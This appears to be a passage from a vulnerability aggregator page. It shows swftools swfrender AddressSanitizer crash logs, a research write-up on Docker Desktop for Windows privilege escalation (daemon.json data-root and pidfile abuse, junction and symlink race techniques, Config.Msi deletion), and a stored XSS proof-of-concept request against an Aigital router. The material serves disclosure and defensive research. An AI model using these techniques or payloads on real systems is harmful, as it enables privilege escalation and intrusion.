    0x7fe2fef21800 is located 0 bytes inside of 8998592-byte region [0x7fe2fef21800,0x7fe2ff7b66c0)
    allocated by thread T0 here:
        #0 0x7fe312423a06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153
        #1 0x559b516d0bc1 in rfx_calloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:69
    
    SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
    ==1148866==ABORTING
    

**3.heap-buffer-overflow****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id157\_heap-buffer-overflow.zip

**crash**

    ./swfrender id157_heap-buffer-overflow -o /dev/null
    =1167329==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb50bafcc00 at pc 0x7fb50f696f3d bp 0x7fffa3c52d40 sp 0x7fffa3c524e8
    WRITE of size 16 at 0x7fb50bafcc00 thread T0
        #0 0x7fb50f696f3c in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
        #1 0x55ca7b7620cc in memset /usr/include/x86_64-linux-gnu/bits/string_fortified.h:71
        #2 0x55ca7b7620cc in render_startpage devices/render.c:922
        #3 0x55ca7b6e28e1 in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:217
        #4 0x7fb50f2f6082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x55ca7b6e0ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
    0x7fb50bafcc00 is located 0 bytes to the right of 13906944-byte region [0x7fb50adb9800,0x7fb50bafcc00)
    allocated by thread T0 here:
        #0 0x7fb50f73c808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x55ca7b77eab9 in rfx_alloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:30
        #2 0x7fb50f2f6082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
    Shadow bytes around the buggy address:
      0x0ff721757930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff721757980:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff721757990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1167329==ABORTING

CVE-2023-29950: bug report -- swfrender · Issue #198 · matthiaskramm/swftools

Docker Desktop for Windows before 4.6 allows attackers to overwrite any file through the windowscontainers/start dockerBackendV2 API by controlling the data-root field inside the DaemonJSON field in the WindowsContainerStartRequest class. This allows exploiting a symlink vulnerability in ..\dataRoot\network\files\local-kv.db because of a TOCTOU race condition.

In the previous blog post, we described how the Docker research started and showed how we could gain a full privilege escalation through a vulnerability in Docker Desktop. In this follow-up blog post, we will show the other vulnerable functions we were able to exploit.

**TL;DR**

We found and reported several privilege escalation vulnerabilities inside Docker Desktop for Windows:

*   Arbitrary file delete that can be leveraged to full privilege escalation: CVE-2022-37326, and CVE-2022-38730.
*   Arbitrary file overwrite: CVE-2022-31647 and CVE-2022-34292.

We adhered to responsible disclosure guidelines, and Docker handled the notifications quickly and efficiently.

**Abusing DaemonJSON through Windows Containers API to Full Privilege Escalation**

We continued with our search for vulnerable API methods and found two promising methods: the start and stop functions inside the WindowsContainersController class. We can use these methods to start and stop the dockerd service from a low-privilege user. Inside the start function, we can see that it receives, as an argument, the class object WindowsContainerStartRequest (Figure 1).

**Figure 1 : The “start” API route in Docker.Backend.HttpAPI namespace.**

This class has three members, and we will focus on the two members that are being used in the Start function:

public class WindowsContainerStartRequest
{
	public Settings Settings { get; set; }
	public string DaemonJSON { get; set; }
	public string UserCertsDirectory { get; set; }
}

The DaemonJSON member holds the value of the path for the daemon.json file (Docker daemon’s configuration file), and the Settings member is a class that contains all the fields (Appendix A) that are inside the daemon JSON file.

Let’s first explain why the Settings member was not relevant to us. After a call to \_windowsDockerDaemon.Start (Figure 1), there was a sequence of function calls where the settings argument was passed to three functions: RewriteOptions, GetServiceEnv and TryToStartService (Figure 2).

**Figure 2 : Start API function.**

But although it was passed as an argument, it was used only in GetServiceEnv method and only for the Proxy fields (Figure 3).

**Figure 3 : GetServiceEnv function.**

We understood that we couldn’t affect the argument settings to manipulate the service. We continued to the next argument controlled by us and checked the daemonOptions argument, and from the RewriteOptions function, we understood that it was being used as a parameter to the switch –config-file in dockerd (see code snippet below), which meant we controlled the dockerd settings.

public string RewriteOptions(string daemonOptions, Settings settings, string userName, bool useProtectedNamedPipe) {
  ...
  optionsObject = JsonConvert.DeserializeObject(daemonOptions);
  ...
  File.WriteAllText(this.\_jsonFilePath, optionsObject.ToString());
  return args + " --config-file \\"" + this.\_jsonFilePath + "\\"";
}

**DaemonJSON Options**

Fortunately, the Docker daemon JSON fields are documented in Docker, and you can see a lot of options there (Appendix B). One thing you will notice is that there are two separate versions – one for Linux and one for Windows – which might cause problems when there are fields that are supposed to work only on Linux or Windows.

We added the requested input to each field in the JSON file and checked if they returned an interesting output. We received some weird stuff, such as making the daemon create a new named pipe by changing the host’s field to something like that:

\\"hosts\\": \[ \\"npipe:////./pipe/docker\_engine\_windows5\\", \\"tcp://127.0.0.1:2376\\" \]

From all these plays, we found two cases where custom settings allowed privilege escalation.

**Abusing data-root to an Arbitrary File Overwrite**

The first field from the JSON file that we are going to look at is data-root. It is a path to a directory containing all the container resources as described in the Docker documentation:

\--data-root is the path where persisted data such as images, volumes, and cluster state are stored. The default value is /var/lib/docker. To avoid any conflict with other daemons, set this parameter separately for each daemon.

Usually, the default path for that field in Windows is C:\\ProgramData\\Docker, which is a protected place that we don’t have control over, but we can change it to anywhere we want.

We set the DaemonJSON variable with a JSON string containing the data-root field with the path C:\\dataRoot:

container.DaemonJSON = "{ \\"data-root\\": \\"c:\\\\\\\\dataRoot\\" }";

After executing the start method, the directory C:\\dataRoot was created, but we didn’t have access to the directory. We easily bypassed it by creating the directory before calling the API request, so that the daemon saw that C:\\dataRoot already exists and wrote all the directories and files with SYSTEM privileges. Then we gained full access to the newly created directory because it inherited the default permissions the standard user had.

The next step was to search inside the directory for files vulnerable to symlink attacks. We found one named C:\\dataRoot\\network\\files\\local-kv.db. When we deleted the directory C:\\dataRoot\\network\\files, followed by stopping and starting the dockerd service through the API (no privileges required), the daemon created the directory and then the file.

This is a classic case of using a TOCTOU attack by exploiting this race condition. We can make the daemon create the directory and, before it creates the file, change the directory to a junction directory, then create an object manager symlink pointing to any place we want (Figure 4).

**Figure 4 : Exploitation process of overwriting files.**

After running the exploit, it took several attempts before we succeeded in changing the directory to a junction directory so we could write the file anywhere (without controlling the content), including protected paths, which can easily cause a denial of service (DoS) if one is creative enough.

This issue was fixed in version 4.7.0 and assigned with CVE-2022-38730.

**Abusing pidfile to Arbitrary Delete and Overwrite File**

The second vulnerable field is the pidfile field, which holds a file path that stores the Docker daemon’s process ID as described in the Docker documentation:

\-p, --pidfile=/var/run/docker.pid is the path where the process ID of the daemon is stored. Specify the path for your pid file here.

We set the DaemonJSON object with a JSON string containing the pidfile field with a privileged location:

{ \\"pidfile\\" : \\"c:\\\\\\\\windows\\\\\\\\evil.txt\\"}

After executing the start method, it created the target file, and if we stopped the service with the stop method, it would delete it (Figure 5).

**Figure 5 : Procmon logs of dockerd creating and deleting a file.**

In such a way, we can delete **any** file we want:  

**From Arbitrary File Deletion to Full LPE**

Deleting arbitrary files is nice, but could we leverage it to full privilege escalation? The Zero Day Initiative published an article about a technique to leverage arbitrary file delete vulnerabilities to full privilege escalation. In short, the technique exploits Windows Installer service behavior when rolling back an installation.

To do it, we needed write access to the directory C:\\Config.msi, a special protected directory that low-privileged users can’t modify. But the Zero Day Initiative authors showed that if the vulnerable process calls to DeleteFileA/DeleteFileW and the directory is **empty**, you could delete the directory by adding the path with the following index data: C:\\Config.Msi::$INDEX\_ALLOCATION (check here for more details about this attribute).

In our case, dockerd used DeleteFileW to delete the file based on the pidfile field (Figure 6).

**Figure 6 : Dockerd using DelteFileW.**

But we couldn’t use this path like that since the first thing that happens is that a file is created from the pidfile field. In our case, it would create a file named C:\\Config.Msi::$INDEX\_ALLOCATION. That would cause a collision because the C:\\Config.Msi directory already existed from old MSI installations (Figure 7).

**Figure 7 : Procmon logs of collision when trying to create a file.**

We bypassed this by passing a random file location like C:\\tmp\\sym\\tmp.txt.  
After the file was created, we deleted the file and converted the file’s directory (c:\\tmp\\sym) to a junction directory with an object manager symlink pointing to C:\\Config.Msi::$INDEX\_ALLOCATION (Figure 8).

**Figure 8 : Using CreateSymlink to create symlink.**

When we stopped the service, it tried to delete the directory but failed because the directory was **not empty** (Figure 9).

**Figure 9 : Failing to delete C:\\Config.msi.**

An empty directory is one of the prerequisites that was mentioned in the article:  
“Note that the only required exploit primitive here is the **ability to delete an empty folder**.”

By looking at the files inside the C:\\Config.Msi directory, we saw that they were randomly generated with a name with numbers and letters. We thought about guessing the names through brute-forcing and trying to delete them, but that involved starting and stopping the service multiple times, which would be time consuming.

C:\\WINDOWS\\system32>dir c:\\Config.Msi
 Volume in drive C is OS
 Volume Serial Number is 8CDA-914A

 Directory of c:\\Config.Msi

31/07/2015  09:57        19,722,432 1011996e.rbf
31/07/2015  09:57        82,045,120 1011996f.rbf
31/07/2015  09:57         1,802,920 101199c8.rbf
16/09/2019  18:45           458,160 10119aff.rbf
31/07/2015  09:58         6,542,016 34558643.rbf
18/06/2020  08:36         1,021,048 43c89f06.rbf
31/07/2015  09:57            70,312 480e66af.rbf
31/07/2015  10:01         1,512,152 480e685b.rbf
31/07/2015  10:00         8,901,800 480e6860.rbf

The next step from our side was to look into the specific OS of Windows 11, and surprisingly, when testing it on a new fresh Windows 11, the C:\\Config.msi directory didn’t exist, we created it with our permissions and the exploit worked.

This issue was fixed in version 4.7.0 and assigned with CVE-2022-37326.

\*In the proof of concept, we created an empty restricted C:\\Config to show it can delete it, but usually you won’t have this directory in a fresh installation.

**Abusing HyperVController for Arbitrary Delete and Overwrite File**

There were two more interesting API functions in the HyperVController (“hyperv”):

1.  hyperv/destroy
2.  hyperv/create

**Abusing Destroy for Arbitrary File Delete**

The destroy API function is implemented by the function DestroyAsync, which receives an object named settings as an argument. It then calls GetDiskPath, which returns a file path to diskpath and eventually deletes the file (Figure 10).

**Figure 10 : Docker.Backend.HyperV class from Docker.Backend.dll.**

The GetDiskPath function took the path from the settings.DataFolder (**controlled by us**) and concatenated it with the name DockerDesktop.vhdx (Figure 11).

**Figure 11 : GetDiskPath function.**

We were able to call the API request with any file path inside the settings.DataFolder variable (i.e C:\\tmp\\myvhd) and delete a file with the name DockerDesktop.vhdx (Figure 12).

**Figure 12 : Deleting DockerDesktop.vhdx**

With the same method we used in the previous exploits, we used a junction directory with object manager symlink to change the name of the default file DockerDesktop.vhdx to any file we chose and deleted it (Figure 13).

**Figure 13 : Deleting a file from a privileged location.**

This issue was fixed in version 4.6.0 and assigned with CVE-2022-31647.

**Abusing Create for Arbitrary File Overwrite**

Similar to the previous vulnerability, the create API function is implemented by the function CreateOrConfigureAsync (Figure 14), which calls GetDiskPath to extract the DataFolder field from the settings object.

**Figure 14 : Creating VM function in Docker.Backend.HyperV class.**

It creates a default DockerDesktop.vhdx file based on the path in the DataFolder field. Therefore, it could be in any place we chose – for example, C:\\Windows (Figure 15).

**Figure 15 : Creating DockerDesktop.vhdx in C:\\Windows.**

In that case, the vmms.exe service was the one that created the file and not com.docker.service like in the previous examples (Figure 16).

**Figure 16 : com.docker.service and vmms being redirected.**

As we did in previous examples, we used the same technique to rename the file to any file we wanted in any location.

This issue was fixed in version 4.6.0 and assigned with CVE-2022-34292.

**Conclusion**

This is the second and final part of our research. In this part, we showed other vulnerable functions that we were able to exploit to gain privilege escalation. All the vulnerabilities were reported and handled quickly and efficiently by Docker.

**Disclosure Timeline**

23/02/22 — Initial report was sent to Docker.  
14/03/22 — Docker released new version 4.6.0 with fix for CVE-2022-31647 and CVE-2022-34292.  
17/03/22 — Docker advised that the fix to the other vulnerabilities will be pushed to version 4.7.0.  
28/03/22 — Docker sent us an installation (version 4.7.0) to check.  
31/03/22 — We checked, and it was fixed; we sent them our feedback.  
07/04/22 — Docker released version 4.7.0 with a fix for CVE-2022-38730 and CVE-2022-37326.

**References**

*   Part 1 of our research:  
    ○ Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1 (cyberark.com)
*   A Docker Desktop privilege escalation vulnerability through named pipe:  
    ○ https://www.pentestpartners.com/security-blog/docker-desktop-for-windows-privesc-cve-2020-11492/
*   Windows named pipes explanation:  
    ○ https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
*   An article by Yarden Shafir and Alex Onescu about a technique to trigger a hijacked DLL to SYSTEM through the Fax service:  
    ○ https://windows-internals.com/faxing-your-way-to-system/  
    ○ https://github.com/ionescu007/faxhell
*   James Forshaw Symbolic link tools:  
    ○ https://github.com/googleprojectzero/symboliclink-testing-tools  
    ○ https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/main/NtApiDotNet
*   An article by Eran Shimony about symbolic links:  
    ○ https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease

**Appendix A – Settings Class**

public Settings()
{
    this.SettingsVersion = 10;
    this.AutoStart = false;
    this.AnalyticsEnabled = true;
    this.OpenUIOnStartupDisabled = false;
    this.AcceptCanaryUpdates = false;
    this.DisplayRestartDialog = true;
    this.DisplaySwitchWinLinContainers = true;
    this.Cpus = Math.Min(Environment.ProcessorCount, 2);
    this.MemoryMiB = 2048;
    this.SwapMiB = 1024;
    this.VpnkitCIDR = "192.168.65.0/28";
    this.OverrideProxyExclude = "";
    this.OverrideProxyHttp = "";
    this.OverrideProxyHttps = "";
    this.UseDnsForwarder = true;
    this.Dns = "8.8.8.8";
    this.DiskSizeMiB = 65536L;
    this.DataFolder = Paths.DefaultVmDataFolder;
    this.FilesharingDirectories = new List();
    this.SynchronizedDirectories = new List();
    this.DisplayedTutorial = false;
    this.DisableHardwareAcceleration = false;
    this.LifecycleTimeoutSeconds = 600;
    this.LastLoginDate = 0L;
}

**Appendix B – Daemon Windows Configuration File (daemon.json)**

{
  "allow-nondistributable-artifacts": \[\],
  "authorization-plugins": \[\],
  "bridge": "",
  "cluster-advertise": "",
  "cluster-store": "",
  "containerd": "\\\\\\\\.\\\\pipe\\\\containerd-containerd",
  "containerd-namespace": "docker",
  "containerd-plugin-namespace": "docker-plugins",
  "data-root": "",
  "debug": true,
  "default-ulimits": {},
  "dns": \[\],
  "dns-opts": \[\],
  "dns-search": \[\],
  "exec-opts": \[\],
  "experimental": false,
  "features": {},
  "fixed-cidr": "",
  "group": "",
  "hosts": \[\],
  "insecure-registries": \[\],
  "labels": \[\],
  "log-driver": "",
  "log-level": "",
  "max-concurrent-downloads": 3,
  "max-concurrent-uploads": 5,
  "max-download-attempts": 5,
  "mtu": 0,
  "pidfile": "",
  "raw-logs": false,
  "registry-mirrors": \[\],
  "shutdown-timeout": 15,
  "storage-driver": "",
  "storage-opts": \[\],
  "swarm-default-advertise-addr": "",
  "tlscacert": "",
  "tlscert": "",
  "tlskey": "",
  "tlsverify": true
}

CVE-2022-38730: Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2

Aigital Wireless-N Repeater version Mini_Router.0.131229 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Aigital Wireless-N Repeater - Stored Cross-Site Scripting# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229XSS StoredPOST /boafrm/formHomeWlanSetup HTTP/1.1Host: 192.168.10.253User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 265Origin: http://192.168.10.253Connection: closeReferer: http://192.168.10.253/home.htmUpgrade-Insecure-Requests: 1submit-url=&submit-value=&wl_onoff=0&wps_clear_configure_by_reg=0&wl_ssid=<script>alert("XSS")</script>&wl_mode=0&wl_channel=0&wl_Method=4&wl_authType=auto&wepEnabled=ON&weplength=&wepformat=&wl_wpaAuth=psk&wl_pskFormat=0&ciphersuite=aes&wpa2ciphersuite=aes&wl_pskValue=12345678&dhcp=0

Tag

#linux